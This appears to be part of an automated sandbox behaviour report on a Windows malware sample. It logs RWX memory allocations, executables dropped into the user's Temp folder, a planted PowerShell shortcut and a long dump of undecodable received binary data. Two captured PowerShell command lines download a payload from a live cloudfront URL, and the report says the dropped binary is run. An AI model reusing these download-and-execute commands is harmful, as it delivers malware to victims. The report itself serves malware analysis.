NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02755000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02756000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02757000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02758000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02759000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b4e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 10, 2024, 10 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\nscF137.tmp\jan.bat
file	C:\Users\test22\AppData\Local\Temp\nscF137.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\i0.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1001','i0.exe')"
cmdline	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1001','stat')"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\i0.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\i0.exe
file	C:\Users\test22\AppData\Local\Temp\is-HMERC.tmp\i0.tmp
file	C:\Users\test22\AppData\Local\Temp\nscF137.tmp\INetC.dll

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 10, 2024, 10 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 184 events)

Data received	[
Data received	Wo´T ×atõªî¿´Ñ4FîAèDOWNGRD ¦´ÙäOÊèÿ9ÌZ«ÀÒZ»Pû72`)3_Àÿ
Data received	b
Data received	6`¨^\²/Yöù%CçiRáqãØ- NoöÈIÙ¶óV®+¶tëÏû&ãº.j;XGVÿ% pSÚtÃgh:ß@ZJNÏC;çVÖpËRî{}®:ç¼1ùEöÂ`ÏY+Ì4Gß¹ÞemÏ,¦¦çÞI\|fN£:m©µî4.º ¸3ßGë±k%ÙÎÑEF2pÞIC¶ls»dêaA¬ÉÔTß/Ç"²&ÌYThü¾/ÄUu@`U9£ð0í0Uÿ0ÿ0Uÿ0U_ßª×0+8¢¸mJò0U#0¿_·ÑÎÝô[U¬Ü×Â©ç0O+C0A0+0http://o.ss2.us/0!+0http://x.ss2.us/x.cer0&U00 http://s.ss2.us/r.crl0U 00U 0 H÷ #ãWÊ}éyLñUýÌSn>GßÆUò²6íSÄ]4(k¾ÇUügêË?²3ÍXøø/õ`ÔÎñÁÝ§uO¹mÞ÷º~@,íÁê»v3w SÝd«'ñiÕM^®ô¡Ãu§XD-ò<p¬ºi¶w1^,ü :Giðy_ôT¤^x`'ÎÂwÿ#Sw]ºÿêYçÛÏ¯ï$5zÆ}ö?ßõrTá©Y{¿R.F²dvHÓØyènVÌ®,×8äÊ [ÿ°¨4IßV©÷°_í3íG·0]ô
Data received	K
Data received	GAñÃb iÅÐAë°ÃÛ[GAór£Å<÷Ýñ¤îH>X!½ZÛÖ$^ÊòdÐ#åæ)(üg/eL1¼ôWødFpÏ^Òn%<#LMÜp¶Þ9êc³ìyÝà÷_óçxZñÜ ¾¡S±â)Ë£ç VÆ®4xÓ3?³bÿVÐHÛÉ$îù¤BP½èø{ü5m$åMJÀ-%/jARHx!hè ÚIÑ¢¥wY~ ,ÒéM@Ã>Såñ¹o&*Ù³ÆWc@$U¯6Q+èvÉºyÈ:w¶ºtáð6ÙóTÁi{µ0½å½>¨À;ÍÛ)¯PX¶:âlÔ»Ø]«ëº:LvÑÈCóø¸ä×°\¶Èï¾âüÈk]
Data received
Data received
Data received
Data received
Data received	0
Data received	ûÉÚÿ!ê4X$Ðü xXd` ,fEÌpLôdÉÊèæ.¤Àø%Ý;Ø¹]².`
Data received
Data received	¨ ¯Þ^[Ãxf³n@@Ý¾·ýDX°WäZ¶} ÕÛ2½ý^KÈ\|W´1±]~Ç,>úðÂ\|A¬¯cvtùA]KáÕíB@èR:^HDV Á²¥Ï$EÀòôÆ¤%\<N½Ã¤,ÕxÍYÏ.ØüT²9K¨EI¡qºÀaAØý²¹Ð gmðI¾Óêö6â¼ìðÙ«±Ò¬Zòs}¶_ «xç×ä,åáÓùaISõ<Ý¶dð ©Of«2çy>îÊg"u!ÿ¡Üc,ÈÂ Âw¸R+.£-È[V {»`QiÐU=ìíÌ«¸ ±zïãÖÃõIÊ.hsÒ?¸ BL~¦HõØ³»á^0³ù¥nI O&bãm ôµÝ_H)%÷Ú'ÒRëÐ ï6É7Å@)8ÎóF¶¼UpÇ¥Cå*¬ò´Å¥CyÉðÙÊÊ^ðÔÄ³Àµ¿
Data received	Wtÿ£®èà@ý/`v å$³Ê ðDOWNGRD zÆ¢ÅåYt!ÏÁM°O%e7ú%ØÀÿ
Data received	GAQÉËy]L1=)õ_&QPLÓµÑF©óËÚâÊÝà¯º<rÉ+©`ç\¾¼ÐN1ôB Xé }>Tò&eYÀ»?U¡WÍ~©Þ§«uHYdÐÞ3\ ¤8UOæ¤üàl«íë5F«ò7s7Î«!ä ¾EKJÐUÚ¨³ú!d]oMíéËßBØ½7¹Éö]j'íöojp¿âÚ# ÍÛÙ³¹ö=®9ÛHqû1-@ì¸Òe(õ£ýML su`KàpÏêØu ²½õ[ôè²º`PBÁ¿h¼V£ìó;ÍO^:rÍnmàÖÓí©æV'ÄäÕd7_xi·îaÓGXç¶ÍJî%öCW
Data received	ÏCl?wÁ¯Ôðô!¢ü~eYæ üj¹ªençñó.yÕÓ
Data received	à
Data received	Ï\|ÈôNîòÕd#r °=\l9Ìè¢ÿÍìËéµ¿ºÁ<`Ã*®UÜßFúÕë(©[62nxA]ssã¡ÚHDt9ÿq ®/Ùj 4¾yÓ¢òY@¥ÅÔß§\|lÙFN7¿.Í¾0ù¦f»ÐÐyÝZF¼ñ^ÉøcOJJ¤úÅ%¼¡EúbfL^·C¨ÍUë[Eå¨àîARºvÆÒQ&}ëH.K}7zÀà ]N\Ï{ÞeÑ9vñ ìvöàuj(Ó°uRõ1wä TWÌ\|.fk\| ¼Íë\,<Ô68ÕB#_ø°\â¦×<J:Åò®-©,ëpèYê%Q_UÐl° ®ÖTõävUïù³~Wt>Þ©D×è'ûù(_ë±È¤)ð,¿2#Àñ¢Q_×p`¢ôySä5N#IãDÆËåïL~§UÀ°ÈVTß¢ê OÖ3@xFÚê¿Hïðº'¿O}ÐýVÝU¶$l[B6"-°Ìí'½¸CújEð§¹±!hICí@`ªôÂíä
Data received	WffQB(±§p<¬kw×ä~¸9Üg³aÀDOWNGRD Ë*=vñ R=ÇçZe)Q5<Þß®Àd6 o7ÇÀÿ
Data received
Data received	GAø~§&\ét]¬¯FË¥LÜaÕ®DæOs¯ ÏXÒÃé þ6Í¡h'=sÀmÀþõ#õbÔÒªÖ¯×tÐ½+ ÃesvyXvA£E±Ù¥)Í±HÐ0?1ÍëlMúmïMèöd»H¿Èsm6ê¯»D't['ès]¿³°°dU"%_=`1Õ*YEnDu ÑgpºóãùwPö %¥Æ8ÿÒºÊoÓÍo?×I8ÎJ,zpENeùí<àÉôâ®ú!³sO£¬²ò£ôMÆGÞ0aH\]ûÝÊô_³ýäwXð~ýzÃêð°×þR«qiàµÅnvûj_õ%:D\|+¥ZPgZ"N#÷ãâ]¹¥
Data received	£q¶ä¬{ÇI@7@cÿLí%Ø+#¢Ý2?]¼ç®¿6hæ#
Data received	p
Data received	³Ü×V[Öök¿OLÍ÷m!C«PcnÀ»ÿkl ;JÂ?;¨[î/Ó}O¢ZW£]» ó:¿9AÎI"ºlU«ÈHP^ðÄ¦EÀ9äã$2 ì¶´¥\°éË6«Ù,Á®E¶ÈA2\ÔæOº÷ÂOuÐºÁVm=!±Ü£ª&w¯V×êPÆæ§! ¨~P@Y'7Ù-(ÇVæ[aZGÍ&@³ngØÂ·Th¤øvQµz£Fø#f&\zà,N3=?ÝØçÐùÿøùUìÁa.üè¼$YK4eè%<×?2ò WZ¯ë¥Ìrõ=¥ìö6¦%óÒ3}/]H¹áó¸þõØÝcÊão$×VBÂ«r+?5ßsò8Aañ®béb¢D\¾NGÐO4ÏÊóQlÐ¨º×#`Ò³àÂ?0ÿÞ¸¨üêêC_Q÷.åM`~;Rµz" ÙÓ(ÓÏh_´sÿ¨è§£\|köyæü~°4(+7Ï êÖÞxt§ºËûå±OÛ-C@ªÙ}µz°fµ]¹ ¥7¡±QzÞTzútè&i¯SE«ÃF oi5I~Ùä«tã\^ 5Àaè Ï´BùZ.½Í;KÚª¡+¤Ã¨ï-nòÎÜ»aj£Jcª¶%Óêò¹zÛÞÃ¥êN¿¹ö®ï¡Ì3n&T+ÝíIõì&ÍÜ¶ÀJ;YïD`IíLâUÿ%\|ãSÎðkO¡ðÜÚ¢R+ðá+ææY]²XHHæy.ÞQwôøV±ûúbØ£P5ñLù[½!#ÚO;Ìvl"ëNðQ©H¹þFMKÞîrGÃsI{âW{Q#lÀ«c/ê36¡êg³clÒ¿¼FmP}ßú·²8Ú¬cë@g:?$\r¡¸ë4¨Ã¥¯$ZÚù>ÍT°bÔ =ßç}'}[]xmW=ðãÕ7ºç9"TeÑMG"ÈÇ/ý: ù=!ü¤¦éJVÂÄDz²;À+$üUß7ïÛ¥v.â_8ìJÅ^±äDØ5Ê§ûXÏª¹Ý±`«¡ú¯`Éêm¹"9»¢H´f[Z$U\|+°÷øæDòð³ÚÏåÝÒæ-M¨\|Í®ÆîqÀÔ RóïØê- R°\>¼)Ðxgá3ª³=¬ ÉçTYMÏæ¥®$Ìõ82(&Äá/áçIB¸[/©Ë(öóOÆÒ6B¯>,x¼%O@¥i\¢hÁ<5n-qÿ;üL»·9' tºú.d=Ïf·2øÂ8\|Aí3ßKÎ$ GèpôQ¼D-´ÀÌw¶×9ïtïw!ê<KODý{±³k¸¯Û3skÚ[SÆø_'oËê ënF70:W&,@s3°6Àtw Ð¤(Ðnv ù3¼ ]ìIOgq¦L®Cxl<¾¸¹6S[÷+l#îs¬#¿¤2ñÕú5+sf`hØHÍùs÷héðÛã¢p¦Kì¬VÁjë vIN« GéÌ£14ØÖi'Ä °áÄàepÌèMNÝ¯n9§F.·qvßnyôZJ]D@Þº³G°Iío;+1K¦®¾ðò6{NbÓù©3¬ÎI2Ð:WIÅ£EAaÞuÏ?iri:¾
Data received	û7Ë±³¿åÃª/8(nnE Qû¹Á/{öYiµÄ2g_¶£Üé/Úúï9òÈHÄÏ~V®ÿè(,î?ÃPa?u¬»¬¯MÇg§üÂx>RS¬ÛªóµXøRÎÁÍG$:® éYÂÑ¡ú½ ø(GvÅ«Úp/øòª«µPtøe¦pÓ$-Î¦lYñzý\|1âôyKâþòÆÔ+¶úÎ°bËE]xâî§½P<·÷ÝPÑmÐãIë§!ü)°{ïÈÇÌ°Ëºü:Ï{~Ea}<µW¨öèl=ª@7 16«ób5¬qa Çé\|·ÑO¡"(°Úe/enc DîuÝÄðHèaO¸ÍÊíÀ¢¹[VÒdõÝ5©y#¡gÄ´AÇA3Ø;nÝíõâAþ¢þß[£3áT&ê¨ª9%~ðÄýJ:'õÆì AÉ5Dÿ)ó7Cèá Îa:Uj½dãÈ¦¢ÍYkÆPh²¡@Î,Fû2/è[`¯ yùfð6æ ìuµÎðj}Rþfµ7Wá $¸UÜ1tâñN¦XH·y8xM{,zÄÈôs]úN ¿ßM;K ×¬»#)tLÓ±''l^æn©n_íäD£\|lo1â6ôS<çÊ ]1Ñ>´?´FÔø#£[ÖMX`4r6ÿºMÓjæôà~ÿ(\cÑ¦{åÚ³(H¯jXãªú×+Ñ)ìÝ8ÐÜ4ìamüCUsÛ<!Ñ:y¿,HvÙÕìOkÁqýS"÷þþWÉp~°e`%ÿV¿¤.}[®xÏ ;O{äB1iÐgF!BÆÄBÕ{÷×«.4)ïîeQ}Ò9Cz ©ÑÍ$¿ HºÎeÌyÄH×:§ÜlÅ/î9Y0FÁW ßÓ¡ÿÒ÷Í¤mç):C¢"9û»3)éÑlêÔRÃ¹i¢Î âè/½¨Ü.ç`Zó5¦b4S¶_½î3i\|þªjòu¦`#QýrE\|°©s¥m°«±Ò'tWl^jhzZ¥Û^ßÆÐ$ë§Äú6æõ©cç+IJûs¿ôîj6Èý/~bìDç)S'áeIÈmÍÚ/é¾_mØx÷\ôGZ¦,(bl ;mÑ·}}ãMËÑAºìøwd"Äg¦³`ê¾Þ"nñïm¦µÒ¦¡ÓCÒß!Ï¤Ù¶É[ÉDdÏ°! ¢o/ªäóÙdØïºÓÆÌ¿÷,µÎ¡äâ;6ûº÷ºè_@i&RøeÇöÃ/KY(d!a°QñZo+×[ØA)èþ![ÏÛk +(uÝùÔQVÎ ´F/¼Hvê¤VWS×\|]ÎQ4Q{l9ýo^AÌåBÛ$,\&Á6¢@©ëGJ¿ÉóÍ&Í&ÍTPAÅÉ©oR pÀWï"·êsa¡×*\Ü-û\|cQ$£?´à¦OOü Ý'«[¡^Î·âîòtE âá¢CYâÐK¾é?¤òF¾³ýþÜîm«ÏSd-h¸)·9 Î¾Ûì_ræ¾}¡´OÕÁ³6[ß©¶ç~Uq½Üj³ËhT©OBg2W nV&
Data received	²®ä$°½ÐJyàiiUËÿzÅïâ'9'§7jkA·¦B!8´'Dï&ËÈ ±)bcÑx:Y+ãWìk¹ÚÖÞðR ÿ³³Q3±Ó£ù}hàSÂ´ëKw4hõÂ¥®]Ë>_8öÙgßº²Û¾¸¼Éú°Zd'WðL5;°nÞf,8ÖVLð1lÒ{ô9ÁfµÓÜÖ»E unaRã¡6{Lô¾e® ~=2Ï?_µ/ÉÌ11Kÿ¨!¥QÃ/xî-øÕM² Ê0°=°4ÿû¢¤3Bj¹O;ØvæYÿ\Od,"AtBÇs ÞÚÚ9{ÂQ)lÎ9Àº!ºÄU÷QT½éìÏ2c#³%fÁEc¸ÈûÎé.¶¼ 3ÖjX`k'·ý¹ýµ`òÜEgÎ»oaV?òãVµ5H1ñ«üXcÀ¡JI´uXß¢µtWÌá)Q¼´vL' @ØÈfB³ïe_®®e"èºÑ°FÁ·½Öñ«ò§¨(RÀ¾_³ªÕ"NwCuÏlÇqÿUê{LVg[ñ§Êë·BXOB[jÖêi0oWõÛzÍÍÿ§® Æ5eàü¶®ZX1 tîÐ1Í%ËÅd+òÖóúÒß¨¾¾(6Xh(¨þ´9ÊÏthxI,z[ÊëÕÐ}A²û½eÖÔë}ßãÛï¯VÎ2Ò-Ò §\©ÆàåR{ñ¯)VÛ¤\|¸(.åøä%"Ö uc¦ýU5FiÛ5a©)vxMèøÈª{Ò«~Z¸¿÷ökRµ9Ôpú qÚó¬/ÒªÉoNØ'É£ÖÚ©ÇØE5P«JÅäâ!}óü ´Î ~âG [b¬ 4iX Ü¦F³üj©Ê¨°ÖO[#òÑÑç8AX5·<´ $I×¨ä~å:ì~äçþXû ôlÝ)²Å¤m\|Ì+dNñßUiúvÃ»Ç²ÜBíaÝ>6Q¢^PßÅ-ë§ÌÅE\AôV0 e¿½0¹ëRæ T¹Ê¢yëÉli ¹ñÂ%ÅßÞ´TU%yÒ#+t¶ó¸¨NjíODz;ý°nès9Ï¿§7#/m5îÝz±Ûüm·PC²ÖÏÃîÊá{ @ ¶Ê`Æ¥6A'Q× ôõri/o¥zkG2)~U7íô0SGvË&Aâü²7mÞÈÞ{âiýpÑ6å¼Ýú¿zÔV¼y¸~Ø1õ~M~4ÁºÿÑÙp/gÅ"/æ&ÒÚëöT©üOiÛ¼ê\ªË#ÚoÅÍ3XL%á(÷Í£ýÝht :¢oDêÑ×HÉÛ'ÿ\bÈ¢øgUV Ã'²ì(eF°µ¬=!tðÆ[´¥ÞhØó"ðRJè¦à&í:})Ôý_HkÇUÈj¹ \.?/}râ%AñÆOÏä&5W{¼K;./.<` /-ÐîÁ]¯ª%¼òÎy÷·sgóGÚÎÃ{6_ÿG"m~:I ®âFX\xøÞú£eªwözpLÉe ØeûUõ»0Lé´@÷CÕ8û°8'/»®ÔËÁTúÍ¬ ;©h,b8üo,þéh[hÛDõLõq·íe$
Data received	¶mÔËæÅ÷Ó«:Ä/A¦mË[¯Ëí0¢`ÚÍAã¨£µ4ézq?Ï¾ _ÇÑ&íöQïiÐ©$ðÀ=Ôêx7©S4O<j=Azíi¤éRr"ôiìp@ËÖJLûnÿù¹KGã jÔäJ¯-²(,bMÈ¹@%hÜÌ¬@¶°Y Ð¬ï°[ãÑò?ntOgð&d¡·+¢÷}ð)ÀÞppÚ'®èbðq£Pkü@+òB¥bËÚOºdzFíê±ÿ¤©('¿ÿYº¨ª»Çf4§$ÂnQ\<ûYç\|w±éÙìAc^ßT¡ÿV³ÛòeÁiz¿q²O2,T6Ï^®v?ÁDk²¶&´(ÇÄÅÍèzäþèËsõíù²ÿSv>E¯ >T@ÖS_"[Z7s)»Ð4×ù§ªM«¬ãB7ä<ÔdL¨õÐËX80YlB6²SÃ´½à^^ïéÎÚW²#®:û;Yõ>óñÙ-X÷{¬»IÇPÝVé) kËNsÌá×iìiG87¾ï l)Ìý51g1y#]Q¹9àò¦VN§ÞÊwÝ ¿à¯bkßÜ±D(kOiqõªIçWþ¬Ív¤ªZª{Í×«GÝñ½l£COÍjOñîfÔûn'#eêÿV5Çìkà\òÄÍ¦Tî®ôéÀ_BêoÃò;ÈjãÚX¦VX¦(@¯¥\v-7ýäïá°Q¶+á7{Ã^¿túÎGUF>PJbÁäªe&ð§k<8TOëáoß[.[ '«yCñÙ:9ÙòyÓ ü`ÔÈ;üöz[¾p+þ¶GÒÑÕ¿ò%a»æ»ê@PÑ%b½ðaÜf;QÃÙ£@«ïó'¬â8ªå'ZÏºXF6TT¡ÀaøtnfSî®CßÏ®Oj@»g]°pr8ÈÄ¢o§-ÌÂj7ØSOTTùºFý¼0zõe J.F´àBæµ¡qÉÏ-órFzá5^ÏHÏ-q0ÿ¿Ù¸0C¿+!å jBWÚ6çõÐ4½Y]¥8ø(½½äÛo9Ck`]50Ï~'<è´ñ¬j¬ÛÉÛÚubXÙf¢ÅTCã·i³tç«=ùEd/BG&ö¶Ó«È»YOWxs×Å¾ó¤52ØÑ3¦¬ÅÐ"Ø+aÛÓ>]®ðònºÌêì ¨5ñ:;";oi+FV}É; MÜñÇa©3Xý?D~.n».cx@îs¿ç¾¥Þ¿½Ùh\|ÊøjmçLn.;zV&Ð¡^"]jtr'·\ pqyÑÅGMG zjÝ¤ô%6§ÝéäjóS¨Q+%`Kñl% Vô»ÑTK.ÌÄ,{kÙeÌYÆ øÃÍ,³>Ifw×÷?ìkxõBÇ@ ¥;² ¿rû¥êP0÷åé<Öfí#:àË´tøÊ,¶,e ®]í¡÷îN:5Î]1²3Yð§ Ãj»r°g-W¬Á0ùÃz¬61É¥)£°×Æª"Í°Ûgi½ì-<zÅ+ÀeT¥¿YÏ~¿3IX,á2
Data received	5êi¦ZòmÒduñqY+Í¼§Êð±Ùý½-ø¼ÆPºÞÃVGÍãÎs¥÷òOóVUîa=èÚp¿7çU`¡Ù¦;9C}Úb]@P¨ãã×H¾!ÒU 5LÉáuáZ7:æÜZMj$ÈÌFD³3ò 9tÎÐo4×éø¹{8Á é×A29¸´¶ª¥HØ¿¸%û·î¦ø}/,a¡,ÈÇîÎT-uÛ>WH8u{:}k½&8>wæ äÊáÉÓW¦\|®EDÝ»4@öZß6&0<Ù&Ç?bWªdÌApuå¨äKö÷ÅÜ¿µÍ¨ªD¶.»è Ú"Ì?%BtH£Ó@M$Ö¿ÁÔÅÛÒè¢_ÙKNÝx¥iH@^_ØNüõf~!¸3®¾£=IOüWh#@ÿä:W¢åVÕò_»±LâWkV3ÌxØ&(7fGhW'Ý¹gðM=~ØiPýM(¼ÖVM¦Ð:eàéÐÿÖ6Ù.Sý&Ä³Hù5oøzYÏ·8ÓçÌ2ñI äò¹4EI¿%ÌK#uÿTÊù´ð±ùº°ÂÆcÇBE:Ø 4<OÑÈÃ}õg5M½±þ¯WäÉÓkE$ÚÍ5^¾KÏJqaºmU)ÊV_Bx¯ëlI76T¯°C¯Â&iÀÌÍnÚ:Ë9Òúåµ.ÈvÛë¤¼ÜCóOqeþ:j¼8heko¬þÇï6{ÖÛã·ÏúqT0¿Ë9ÆÚ}Ö%Ëw3ÓÇN¦9AÚØí_9À»¹}äsOÓDböß´k¦¢w¿ ¶)uçaÅßÓþ¯wÑ@ÙçBÔm×±KæµÆçoÄe¥¢i5£(¢b2¶ÞD§3éÃðï?ÖröJ\|çg¯O¡óÖ~ô?«[Ú½WÀ<8¤rÆåa¢¥Û-gq;öLÝæ&Ù:Q/"tiøcÙä!=(kaÏø(u »Æ<ðªSâ)xä];ê¶²lz¬.3 ä¯ü5 